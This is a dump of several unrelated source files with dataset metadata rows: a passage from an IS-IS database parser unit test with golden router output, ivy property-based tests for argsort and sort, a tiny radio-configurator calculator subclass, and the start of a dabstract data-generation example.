'nlpid': '0xCC 0x8E',
'router_id': '10.36.3.3',
'ip_address': '10.36.3.3',
'mt_entries': {
2: {
'att': 0,
'ol': 0,
},
0: {
'att': 0,
'ol': 0,
},
},
'hostname': 'R3_nx',
'length': 5,
'mt_is_neighbor': {
'R3_nx.00': {
'neighbor_id': 'R1_xe.02',
'metric': 40,
'topo_id': 2,
},
},
'extended_is_neighbor': {
'R2_xr.03': {
'neighbor_id': 'R2_xr.03',
'metric': 40,
},
'R1_xe.02': {
'neighbor_id': 'R1_xe.02',
'metric': 40,
},
},
'extended_ip': {
'10.36.3.3/32': {
'metric': 1,
'up_down': 'U',
},
'10.13.115.0/24': {
'metric': 40,
'up_down': 'U',
},
'10.23.115.0/24': {
'metric': 40,
'up_down': 'U',
},
},
'mt_ipv6_prefix': {
'2001:3:3:3::3/128': {
'metric': 1,
'topo_id': 2,
'up_down': 'U',
'ext_origin': 'I',
},
'2001:10:13:115::/64': {
'metric': 40,
'topo_id': 2,
'up_down': 'U',
'ext_origin': 'I',
},
'2001:10:23:115::/64': {
'metric': 40,
'topo_id': 2,
'up_down': 'U',
'ext_origin': 'I',
},
},
'digest_offset': 0,
},
},
},
},
'VRF1': {
'level_db': {
1: {
'R1_xe.00-00': {
'lsp_id': 'R1_xe.00-00',
'sequence': '0x000007CA',
'checksum': '0xC7FC',
'lifetime': 616,
'attach_bit': 0,
'p_bit': 0,
'overload_bit': 0,
't_bit': 3,
'lsp_status': '',
'instance': '0x000007C6',
'area_address': '49.0001',
'nlpid': '0xCC 0x8E',
'mt_entries': {
0: {
'att': 0,
'ol': 0,
},
2: {
'att': 0,
'ol': 0,
},
},
'hostname': 'R1_xe',
'length': 5,
'extended_is_neighbor': {
'R1_xe.02': {
'neighbor_id': 'R1_xe.02',
'metric': 10,
},
},
'mt_is_neighbor': {
'R1_xe.02': {
'neighbor_id': 'R1_xe.02',
'metric': 10,
'topo_id': 2,
},
},
'ip_address': '10.13.115.1',
'extended_ip': {
'10.12.115.0/24': {
'metric': 10,
'up_down': 'U',
'sub_tlv_length': 1,
'sub_tlv_type': 4,
},
'10.13.115.0/24': {
'metric': 10,
'up_down': 'U',
'sub_tlv_length': 1,
'sub_tlv_type': 4,
},
},
'ipv6_address': '2001:10:13:115::1',
'mt_ipv6_prefix': {
'2001:10:12:115::/64': {
'metric': 10,
'topo_id': 2,
'up_down': 'U',
'ext_origin': 'I',
'sub_tlv_length': 1,
'sub_tlv_type': 4,
},
'2001:10:13:115::/64': {
'metric': 10,
'topo_id': 2,
'up_down': 'U',
'ext_origin': 'I',
'sub_tlv_length': 1,
'sub_tlv_type': 4,
},
},
'digest_offset': 0,
},
'R1_xe.02-00': {
'lsp_id': 'R1_xe.02-00',
'sequence': '0x000007C7',
'checksum': '0x0D6A',
'lifetime': 625,
'attach_bit': 0,
'p_bit': 0,
'overload_bit': 0,
't_bit': 3,
'lsp_status': '',
'instance': '0x000007C6',
'extended_is_neighbor': {
'R1_xe.00': {
'neighbor_id': 'R1_xe.00',
'metric': 0,
},
'R3_nx.00': {
'neighbor_id': 'R3_nx.00',
'metric': 0,
},
},
'digest_offset': 0,
},
'R3_nx.00-00': {
'lsp_id': 'R3_nx.00-00',
'sequence': '0x00000B09',
'checksum': '0x68C0',
'lifetime': 841,
'attach_bit': 0,
'p_bit': 0,
'overload_bit': 0,
't_bit': 3,
'lsp_status': '*',
'instance': '0x00000B09',
'area_address': '49.0001',
'nlpid': '0xCC 0x8E',
'router_id': '10.36.3.3',
'ip_address': '10.36.3.3',
'mt_entries': {
2: {
'att': 0,
'ol': 0,
},
0: {
'att': 0,
'ol': 0,
},
},
'hostname': 'R3_nx',
'length': 5,
'mt_is_neighbor': {
'R3_nx.00': {
'neighbor_id': 'R1_xe.02',
'metric': 40,
'topo_id': 2,
},
},
'extended_is_neighbor': {
'R1_xe.02': {
'neighbor_id': 'R1_xe.02',
'metric': 40,
},
},
'extended_ip': {
'10.36.3.3/32': {
'metric': 1,
'up_down': 'U',
},
'10.13.115.0/24': {
'metric': 40,
'up_down': 'U',
},
'10.23.115.0/24': {
'metric': 40,
'up_down': 'U',
},
},
'mt_ipv6_prefix': {
'2001:3:3:3::3/128': {
'metric': 1,
'topo_id': 2,
'up_down': 'U',
'ext_origin': 'I',
},
'2001:10:13:115::/64': {
'metric': 40,
'topo_id': 2,
'up_down': 'U',
'ext_origin': 'I',
},
'2001:10:23:115::/64': {
'metric': 40,
'topo_id': 2,
'up_down': 'U',
'ext_origin': 'I',
},
},
'digest_offset': 0,
},
},
2: {
'R1_xe.00-00': {
'lsp_id': 'R1_xe.00-00',
'sequence': '0x000007CB',
'checksum': '0x25D3',
'lifetime': 908,
'attach_bit': 0,
'p_bit': 0,
'overload_bit': 0,
't_bit': 3,
'lsp_status': '',
'instance': '0x000007C6',
'area_address': '49.0001',
'nlpid': '0xCC 0x8E',
'mt_entries': {
0: {
'att': 0,
'ol': 0,
},
2: {
'att': 0,
'ol': 0,
},
},
'hostname': 'R1_xe',
'length': 5,
'extended_is_neighbor': {
'R1_xe.02': {
'neighbor_id': 'R1_xe.02',
'metric': 10,
},
},
'mt_is_neighbor': {
'R1_xe.02': {
'neighbor_id': 'R1_xe.02',
'metric': 10,
'topo_id': 2,
},
},
'ip_address': '10.13.115.1',
'extended_ip': {
'10.12.115.0/24': {
'metric': 10,
'up_down': 'U',
'sub_tlv_length': 1,
'sub_tlv_type': 4,
},
'10.13.115.0/24': {
'metric': 10,
'up_down': 'U',
'sub_tlv_length': 1,
'sub_tlv_type': 4,
},
'10.23.115.0/24': {
'metric': 50,
'up_down': 'U',
'sub_tlv_length': 1,
'sub_tlv_type': 4,
},
},
'ipv6_address': '2001:10:13:115::1',
'mt_ipv6_prefix': {
'2001:10:12:115::/64': {
'metric': 10,
'topo_id': 2,
'up_down': 'U',
'ext_origin': 'I',
'sub_tlv_length': 1,
'sub_tlv_type': 4,
},
'2001:10:13:115::/64': {
'metric': 10,
'topo_id': 2,
'up_down': 'U',
'ext_origin': 'I',
'sub_tlv_length': 1,
'sub_tlv_type': 4,
},
'2001:10:23:115::/64': {
'metric': 50,
'topo_id': 2,
'up_down': 'U',
'ext_origin': 'I',
'sub_tlv_length': 1,
'sub_tlv_type': 4,
},
},
'digest_offset': 0,
},
'R1_xe.02-00': {
'lsp_id': 'R1_xe.02-00',
'sequence': '0x000007C6',
'checksum': '0x27D9',
'lifetime': 1174,
'attach_bit': 0,
'p_bit': 0,
'overload_bit': 0,
't_bit': 3,
'lsp_status': '',
'instance': '0x000007C5',
'extended_is_neighbor': {
'R1_xe.00': {
'neighbor_id': 'R1_xe.00',
'metric': 0,
},
'R3_nx.00': {
'neighbor_id': 'R3_nx.00',
'metric': 0,
},
},
'digest_offset': 0,
},
'R3_nx.00-00': {
'lsp_id': 'R3_nx.00-00',
'sequence': '0x00000B06',
'checksum': '0x6EBD',
'lifetime': 1136,
'attach_bit': 0,
'p_bit': 0,
'overload_bit': 0,
't_bit': 3,
'lsp_status': '*',
'instance': '0x00000B06',
'area_address': '49.0001',
'nlpid': '0xCC 0x8E',
'router_id': '10.36.3.3',
'ip_address': '10.36.3.3',
'mt_entries': {
2: {
'att': 0,
'ol': 0,
},
0: {
'att': 0,
'ol': 0,
},
},
'hostname': 'R3_nx',
'length': 5,
'mt_is_neighbor': {
'R3_nx.00': {
'neighbor_id': 'R1_xe.02',
'metric': 40,
'topo_id': 2,
},
},
'extended_is_neighbor': {
'R1_xe.02': {
'neighbor_id': 'R1_xe.02',
'metric': 40,
},
},
'extended_ip': {
'10.36.3.3/32': {
'metric': 1,
'up_down': 'U',
},
'10.13.115.0/24': {
'metric': 40,
'up_down': 'U',
},
'10.23.115.0/24': {
'metric': 40,
'up_down': 'U',
},
},
'mt_ipv6_prefix': {
'2001:3:3:3::3/128': {
'metric': 1,
'topo_id': 2,
'up_down': 'U',
'ext_origin': 'I',
},
'2001:10:13:115::/64': {
'metric': 40,
'topo_id': 2,
'up_down': 'U',
'ext_origin': 'I',
},
'2001:10:23:115::/64': {
'metric': 40,
'topo_id': 2,
'up_down': 'U',
'ext_origin': 'I',
},
},
'digest_offset': 0,
},
},
},
},
},
},
},
}
golden_output = {'execute.return_value': '''\
R3_nx# show isis database detail vrf all
IS-IS Process: test LSP database VRF: default
IS-IS Level-1 Link State Database
LSPID Seq Number Checksum Lifetime A/P/O/T
R1_xe.00-00 0x000007CD 0xAD22 1199 0/0/0/3
Instance : 0x000007C9
Area Address : 49.0001
NLPID : 0xCC 0x8E
MT TopoId : TopoId:0 Att: 0 Ol: 0
TopoId:2 Att: 0 Ol: 0
Hostname : R1_xe Length : 5
Extended IS : R1_xe.02 Metric : 10
TopoId: 2
MtExtend IS : R1_xe.02 Metric : 10
Extended IS : R1_xe.01 Metric : 10
TopoId: 2
MtExtend IS : R1_xe.01 Metric : 10
IP Address : 10.13.115.1
Extended IP : 10.12.115.0/24 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.13.115.0/24 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
IPv6 Address : 2001:10:13:115::1
MT-IPv6 Prefx : TopoId : 2
2001:10:12:115::/64 Metric : 10 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:10:13:115::/64 Metric : 10 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
Digest Offset : 0
R1_xe.01-00 0x000007C7 0x14CA 846 0/0/0/3
Instance : 0x000007C6
Extended IS : R1_xe.00 Metric : 0
Extended IS : R2_xr.00 Metric : 0
Digest Offset : 0
R1_xe.02-00 0x000007C7 0x0D6A 852 0/0/0/3
Instance : 0x000007C6
Extended IS : R1_xe.00 Metric : 0
Extended IS : R3_nx.00 Metric : 0
Digest Offset : 0
R2_xr.00-00 0x000007C5 0x94D6 887 0/0/0/3
Instance : 0x000007BD
Area Address : 49.0001
NLPID : 0xCC 0x8E
IP Address : 10.16.2.2
Extended IP : 10.16.2.2/32 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.12.115.0/24 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.23.115.0/24 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Hostname : R2_xr Length : 5
IPv6 Address : 2001:2:2:2::2
MT-IPv6 Prefx : TopoId : 2
2001:2:2:2::2/128 Metric : 10 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:10:12:115::/64 Metric : 10 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:10:23:115::/64 Metric : 10 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
MT TopoId : TopoId:0 Att: 0 Ol: 0
TopoId:2 Att: 0 Ol: 0
Extended IS : R1_xe.01 Metric : 10
Extended IS : R2_xr.03 Metric : 10
TopoId: 2
MtExtend IS : R1_xe.01 Metric : 10
R2_xr.03 Metric : 10
Digest Offset : 0
R2_xr.03-00 0x000007C6 0x86AC 594 0/0/0/3
Instance : 0x000007C5
Extended IS : R2_xr.00 Metric : 0
Extended IS : R3_nx.00 Metric : 0
Digest Offset : 0
R3_nx.00-00 * 0x00000B05 0x7FA7 653 0/0/0/3
Instance : 0x00000B05
Area Address : 49.0001
NLPID : 0xCC 0x8E
Router ID : 10.36.3.3
IP Address : 10.36.3.3
MT TopoId : TopoId:2 Att: 0 Ol: 0
TopoId:0 Att: 0 Ol: 0
Hostname : R3_nx Length : 5
TopoId: 2
MtExtend IS : R2_xr.03 Metric : 40
R1_xe.02 Metric : 40
Extended IS : R2_xr.03 Metric : 40
Extended IS : R1_xe.02 Metric : 40
Extended IP : 10.36.3.3/32 Metric : 1 (U)
Extended IP : 10.13.115.0/24 Metric : 40 (U)
Extended IP : 10.23.115.0/24 Metric : 40 (U)
MT-IPv6 Prefx : TopoId : 2
2001:3:3:3::3/128 Metric : 1 (U/I)
MT-IPv6 Prefx : TopoId : 2
2001:10:13:115::/64 Metric : 40 (U/I)
MT-IPv6 Prefx : TopoId : 2
2001:10:23:115::/64 Metric : 40 (U/I)
Digest Offset : 0
IS-IS Level-2 Link State Database
LSPID Seq Number Checksum Lifetime A/P/O/T
R1_xe.00-00 0x000007C9 0xBB89 1087 0/0/0/3
Instance : 0x000007C4
Area Address : 49.0001
NLPID : 0xCC 0x8E
MT TopoId : TopoId:0 Att: 0 Ol: 0
TopoId:2 Att: 0 Ol: 0
Hostname : R1_xe Length : 5
Extended IS : R1_xe.02 Metric : 10
TopoId: 2
MtExtend IS : R1_xe.02 Metric : 10
Extended IS : R1_xe.01 Metric : 10
TopoId: 2
MtExtend IS : R1_xe.01 Metric : 10
IP Address : 10.13.115.1
Extended IP : 10.12.115.0/24 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.13.115.0/24 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.23.115.0/24 Metric : 20 (U)
Unknown Sub-TLV : Length : 1 Type : 4
IPv6 Address : 2001:10:13:115::1
MT-IPv6 Prefx : TopoId : 2
2001:10:12:115::/64 Metric : 10 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:10:13:115::/64 Metric : 10 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:10:23:115::/64 Metric : 20 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
Digest Offset : 0
R1_xe.01-00 0x000007C0 0x3A34 1137 0/0/0/3
Instance : 0x000007BF
Extended IS : R1_xe.00 Metric : 0
Extended IS : R2_xr.00 Metric : 0
Digest Offset : 0
R1_xe.02-00 0x000007C8 0x23DB 867 0/0/0/3
Instance : 0x000007C7
Extended IS : R1_xe.00 Metric : 0
Extended IS : R3_nx.00 Metric : 0
Digest Offset : 0
R2_xr.00-00 0x000007D1 0xE002 813 0/0/0/3
Instance : 0x000007C9
Area Address : 49.0001
NLPID : 0xCC 0x8E
IP Address : 10.16.2.2
Extended IP : 10.16.2.2/32 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.12.115.0/24 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.23.115.0/24 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.36.3.3/32 Metric : 11 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.13.115.0/24 Metric : 20 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Hostname : R2_xr Length : 5
IPv6 Address : 2001:2:2:2::2
MT-IPv6 Prefx : TopoId : 2
2001:2:2:2::2/128 Metric : 10 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:10:12:115::/64 Metric : 10 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:10:23:115::/64 Metric : 10 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:3:3:3::3/128 Metric : 11 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:10:13:115::/64 Metric : 20 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
MT TopoId : TopoId:0 Att: 0 Ol: 0
TopoId:2 Att: 0 Ol: 0
Extended IS : R2_xr.03 Metric : 10
Extended IS : R1_xe.01 Metric : 10
TopoId: 2
MtExtend IS : R2_xr.03 Metric : 10
R1_xe.01 Metric : 10
Digest Offset : 0
R2_xr.03-00 0x000007C2 0x8EA8 784 0/0/0/3
Instance : 0x000007C1
Extended IS : R2_xr.00 Metric : 0
Extended IS : R3_nx.00 Metric : 0
Digest Offset : 0
R3_nx.00-00 * 0x00000B05 0x7FA7 1040 0/0/0/3
Instance : 0x00000B05
Area Address : 49.0001
NLPID : 0xCC 0x8E
Router ID : 10.36.3.3
IP Address : 10.36.3.3
MT TopoId : TopoId:2 Att: 0 Ol: 0
TopoId:0 Att: 0 Ol: 0
Hostname : R3_nx Length : 5
TopoId: 2
MtExtend IS : R2_xr.03 Metric : 40
R1_xe.02 Metric : 40
Extended IS : R2_xr.03 Metric : 40
Extended IS : R1_xe.02 Metric : 40
Extended IP : 10.36.3.3/32 Metric : 1 (U)
Extended IP : 10.13.115.0/24 Metric : 40 (U)
Extended IP : 10.23.115.0/24 Metric : 40 (U)
MT-IPv6 Prefx : TopoId : 2
2001:3:3:3::3/128 Metric : 1 (U/I)
MT-IPv6 Prefx : TopoId : 2
2001:10:13:115::/64 Metric : 40 (U/I)
MT-IPv6 Prefx : TopoId : 2
2001:10:23:115::/64 Metric : 40 (U/I)
Digest Offset : 0
IS-IS Process: test LSP database VRF: VRF1
IS-IS Level-1 Link State Database
LSPID Seq Number Checksum Lifetime A/P/O/T
R1_xe.00-00 0x000007CA 0xC7FC 616 0/0/0/3
Instance : 0x000007C6
Area Address : 49.0001
NLPID : 0xCC 0x8E
MT TopoId : TopoId:0 Att: 0 Ol: 0
TopoId:2 Att: 0 Ol: 0
Hostname : R1_xe Length : 5
Extended IS : R1_xe.02 Metric : 10
TopoId: 2
MtExtend IS : R1_xe.02 Metric : 10
IP Address : 10.13.115.1
Extended IP : 10.12.115.0/24 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.13.115.0/24 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
IPv6 Address : 2001:10:13:115::1
MT-IPv6 Prefx : TopoId : 2
2001:10:12:115::/64 Metric : 10 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:10:13:115::/64 Metric : 10 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
Digest Offset : 0
R1_xe.02-00 0x000007C7 0x0D6A 625 0/0/0/3
Instance : 0x000007C6
Extended IS : R1_xe.00 Metric : 0
Extended IS : R3_nx.00 Metric : 0
Digest Offset : 0
R3_nx.00-00 * 0x00000B09 0x68C0 841 0/0/0/3
Instance : 0x00000B09
Area Address : 49.0001
NLPID : 0xCC 0x8E
Router ID : 10.36.3.3
IP Address : 10.36.3.3
MT TopoId : TopoId:2 Att: 0 Ol: 0
TopoId:0 Att: 0 Ol: 0
Hostname : R3_nx Length : 5
TopoId: 2
MtExtend IS : R1_xe.02 Metric : 40
Extended IS : R1_xe.02 Metric : 40
Extended IP : 10.36.3.3/32 Metric : 1 (U)
Extended IP : 10.13.115.0/24 Metric : 40 (U)
Extended IP : 10.23.115.0/24 Metric : 40 (U)
MT-IPv6 Prefx : TopoId : 2
2001:3:3:3::3/128 Metric : 1 (U/I)
MT-IPv6 Prefx : TopoId : 2
2001:10:13:115::/64 Metric : 40 (U/I)
MT-IPv6 Prefx : TopoId : 2
2001:10:23:115::/64 Metric : 40 (U/I)
Digest Offset : 0
IS-IS Level-2 Link State Database
LSPID Seq Number Checksum Lifetime A/P/O/T
R1_xe.00-00 0x000007CB 0x25D3 908 0/0/0/3
Instance : 0x000007C6
Area Address : 49.0001
NLPID : 0xCC 0x8E
MT TopoId : TopoId:0 Att: 0 Ol: 0
TopoId:2 Att: 0 Ol: 0
Hostname : R1_xe Length : 5
Extended IS : R1_xe.02 Metric : 10
TopoId: 2
MtExtend IS : R1_xe.02 Metric : 10
IP Address : 10.13.115.1
Extended IP : 10.12.115.0/24 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.13.115.0/24 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.23.115.0/24 Metric : 50 (U)
Unknown Sub-TLV : Length : 1 Type : 4
IPv6 Address : 2001:10:13:115::1
MT-IPv6 Prefx : TopoId : 2
2001:10:12:115::/64 Metric : 10 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:10:13:115::/64 Metric : 10 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:10:23:115::/64 Metric : 50 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
Digest Offset : 0
R1_xe.02-00 0x000007C6 0x27D9 1174 0/0/0/3
Instance : 0x000007C5
Extended IS : R1_xe.00 Metric : 0
Extended IS : R3_nx.00 Metric : 0
Digest Offset : 0
R3_nx.00-00 * 0x00000B06 0x6EBD 1136 0/0/0/3
Instance : 0x00000B06
Area Address : 49.0001
NLPID : 0xCC 0x8E
Router ID : 10.36.3.3
IP Address : 10.36.3.3
MT TopoId : TopoId:2 Att: 0 Ol: 0
TopoId:0 Att: 0 Ol: 0
Hostname : R3_nx Length : 5
TopoId: 2
MtExtend IS : R1_xe.02 Metric : 40
Extended IS : R1_xe.02 Metric : 40
Extended IP : 10.36.3.3/32 Metric : 1 (U)
Extended IP : 10.13.115.0/24 Metric : 40 (U)
Extended IP : 10.23.115.0/24 Metric : 40 (U)
MT-IPv6 Prefx : TopoId : 2
2001:3:3:3::3/128 Metric : 1 (U/I)
MT-IPv6 Prefx : TopoId : 2
2001:10:13:115::/64 Metric : 40 (U/I)
MT-IPv6 Prefx : TopoId : 2
2001:10:23:115::/64 Metric : 40 (U/I)
Digest Offset : 0
R3_nx#
'''}
def test_empty(self):
    """Parsing empty device output must raise SchemaEmptyParserError."""
    self.device = Mock(**self.empty_output)
    parser = ShowIsisDatabaseDetail(device=self.device)
    with self.assertRaises(SchemaEmptyParserError):
        parser.parse()
def test_golden(self):
    """Golden device output parses into the expected structure."""
    self.device = Mock(**self.golden_output)
    parser = ShowIsisDatabaseDetail(device=self.device)
    self.assertEqual(parser.parse(vrf='all'), self.golden_parsed_output)
# Allow running this test module directly from the command line.
if __name__ == '__main__':
    unittest.main()
| 50.8479
| 102
| 0.247856
| 9,861
| 150,103
| 3.639793
| 0.049792
| 0.016494
| 0.024072
| 0.026078
| 0.895353
| 0.881366
| 0.86061
| 0.835674
| 0.822941
| 0.80107
| 0
| 0.173896
| 0.66976
| 150,103
| 2,952
| 103
| 50.8479
| 0.550171
| 0.000107
| 0
| 0.68902
| 0
| 0.006254
| 0.341595
| 0.005757
| 0
| 0
| 0.009435
| 0
| 0.005212
| 1
| 0.005212
| false
| 0.000695
| 0.001737
| 0
| 0.022238
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1cbc0dc680bb8483386400ed568bdb5162ba4541
| 3,002
|
py
|
Python
|
ivy_tests/test_ivy/test_functional/test_core/test_sorting.py
|
VedPatwardhan/ivy
|
7b2105fa8cf38879444a1029bfaa7f0b2f27717a
|
[
"Apache-2.0"
] | 1
|
2022-02-13T19:35:02.000Z
|
2022-02-13T19:35:02.000Z
|
ivy_tests/test_ivy/test_functional/test_core/test_sorting.py
|
Arijit1000/ivy
|
de193946a580ca0f54d78fe7fc4031a6ff66d2bb
|
[
"Apache-2.0"
] | null | null | null |
ivy_tests/test_ivy/test_functional/test_core/test_sorting.py
|
Arijit1000/ivy
|
de193946a580ca0f54d78fe7fc4031a6ff66d2bb
|
[
"Apache-2.0"
] | null | null | null |
"""Collection of tests for sorting functions."""
# global
from hypothesis import given, strategies as st
import numpy as np
# local
import ivy_tests.test_ivy.helpers as helpers
import ivy.functional.backends.numpy as ivy_np
# argsort
@given(
    array_shape=helpers.lists(
        st.integers(1, 5), min_size="num_dims", max_size="num_dims", size_bounds=[1, 5]
    ),
    input_dtype=st.sampled_from(ivy_np.valid_dtypes),
    data=st.data(),
    as_variable=st.booleans(),
    with_out=st.booleans(),
    num_positional_args=helpers.num_positional_args(fn_name="argsort"),
    native_array=st.booleans(),
    container=st.booleans(),
    instance_method=st.booleans(),
)
def test_argsort(
    array_shape,
    input_dtype,
    data,
    as_variable,
    with_out,
    num_positional_args,
    native_array,
    container,
    instance_method,
    fw,
):
    """Property-based test driving ``argsort`` through the array-function harness."""
    # torch lacks kernels for these unsigned dtypes — nothing to test there
    if fw == "torch" and input_dtype in ("uint16", "uint32", "uint64"):
        return
    # NaNs make ordering ill-defined, so reject arrays containing any
    values = data.draw(
        helpers.nph.arrays(shape=array_shape, dtype=input_dtype).filter(
            lambda arr: not np.isnan(arr).any()
        )
    )
    rank = values.ndim
    sort_axis = data.draw(st.integers(-rank, rank - 1))
    descending = data.draw(st.booleans())
    stable = data.draw(st.booleans())
    helpers.test_array_function(
        input_dtype,
        as_variable,
        with_out,
        num_positional_args,
        native_array,
        container,
        instance_method,
        fw,
        "argsort",
        x=values,
        axis=sort_axis,
        descending=descending,
        stable=stable,
    )
# sort
@given(
    array_shape=helpers.lists(
        st.integers(1, 5), min_size="num_dims", max_size="num_dims", size_bounds=[1, 5]
    ),
    input_dtype=st.sampled_from(ivy_np.valid_dtypes),
    data=st.data(),
    as_variable=st.booleans(),
    with_out=st.booleans(),
    num_positional_args=helpers.num_positional_args(fn_name="sort"),
    native_array=st.booleans(),
    container=st.booleans(),
    instance_method=st.booleans(),
)
def test_sort(
    array_shape,
    input_dtype,
    data,
    as_variable,
    with_out,
    num_positional_args,
    native_array,
    container,
    instance_method,
    fw,
):
    """Property-based test driving ``sort`` through the array-function harness."""
    # torch lacks kernels for these unsigned dtypes — nothing to test there
    if fw == "torch" and input_dtype in ("uint16", "uint32", "uint64"):
        return
    # NaNs make ordering ill-defined, so reject arrays containing any
    values = data.draw(
        helpers.nph.arrays(shape=array_shape, dtype=input_dtype).filter(
            lambda arr: not np.isnan(arr).any()
        )
    )
    rank = values.ndim
    sort_axis = data.draw(st.integers(-rank, rank - 1))
    descending = data.draw(st.booleans())
    stable = data.draw(st.booleans())
    helpers.test_array_function(
        input_dtype,
        as_variable,
        with_out,
        num_positional_args,
        native_array,
        container,
        instance_method,
        fw,
        "sort",
        x=values,
        axis=sort_axis,
        descending=descending,
        stable=stable,
    )
| 23.453125
| 87
| 0.622252
| 385
| 3,002
| 4.636364
| 0.218182
| 0.078431
| 0.07619
| 0.038095
| 0.87619
| 0.87619
| 0.87619
| 0.87619
| 0.829132
| 0.829132
| 0
| 0.009888
| 0.258827
| 3,002
| 127
| 88
| 23.637795
| 0.79236
| 0.049634
| 0
| 0.830189
| 0
| 0
| 0.035211
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.018868
| false
| 0
| 0.037736
| 0
| 0.075472
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1cfd904c7bbd0bb806cd967d9fc3db93d35b4b1c
| 110
|
py
|
Python
|
platform/radio/efr32_multiphy_configurator/pyradioconfig/parts/nixi/calculators/calc_dsa.py
|
lmnotran/gecko_sdk
|
2e82050dc8823c9fe0e8908c1b2666fb83056230
|
[
"Zlib"
] | 82
|
2016-06-29T17:24:43.000Z
|
2021-04-16T06:49:17.000Z
|
platform/radio/efr32_multiphy_configurator/pyradioconfig/parts/nixi/calculators/calc_dsa.py
|
lmnotran/gecko_sdk
|
2e82050dc8823c9fe0e8908c1b2666fb83056230
|
[
"Zlib"
] | 6
|
2022-01-12T18:22:08.000Z
|
2022-03-25T10:19:27.000Z
|
platform/radio/efr32_multiphy_configurator/pyradioconfig/parts/nixi/calculators/calc_dsa.py
|
lmnotran/gecko_sdk
|
2e82050dc8823c9fe0e8908c1b2666fb83056230
|
[
"Zlib"
] | 56
|
2016-08-02T10:50:50.000Z
|
2021-07-19T08:57:34.000Z
|
from pyradioconfig.parts.jumbo.calculators.calc_dsa import CALC_DSA
class CALC_DSA_nixi(CALC_DSA):
    """DSA calculator for the Nixi part.

    Inherits all behaviour unchanged from the Jumbo-part CALC_DSA base class.
    """
    pass
| 18.333333
| 67
| 0.818182
| 17
| 110
| 5
| 0.647059
| 0.329412
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.118182
| 110
| 6
| 68
| 18.333333
| 0.876289
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
e80e340533f19e068f642fd4b182769288fe32d1
| 12,748
|
py
|
Python
|
examples/introduction/Readme_1_processing_chain.py
|
magics-tech/dabstract-1
|
9f7a2d99d0dff1df5c2f90c82b1eecc9c42c2c24
|
[
"MIT"
] | 7
|
2020-11-04T13:21:01.000Z
|
2021-12-14T13:08:04.000Z
|
examples/introduction/Readme_1_processing_chain.py
|
magics-tech/dabstract-1
|
9f7a2d99d0dff1df5c2f90c82b1eecc9c42c2c24
|
[
"MIT"
] | null | null | null |
examples/introduction/Readme_1_processing_chain.py
|
magics-tech/dabstract-1
|
9f7a2d99d0dff1df5c2f90c82b1eecc9c42c2c24
|
[
"MIT"
] | 2
|
2020-11-26T09:25:23.000Z
|
2021-09-22T12:05:14.000Z
|
import numpy as np
import os
from scipy.io.wavfile import write as audio_write
### Generate data
# Synthesize random demo data and persist every multi-example row both as a
# .wav and a .npy file so the later sections can read from disk.
data = np.random.uniform(size=(10000)) # single example
DATA = np.random.uniform(size=(10,10000)) # multi example
wavfiles, numpyfiles = [], []
datafolder = 'data_intro/data'
os.makedirs(datafolder,exist_ok=True)
os.makedirs(datafolder + '_numpy',exist_ok=True)
for k,D in enumerate(DATA):
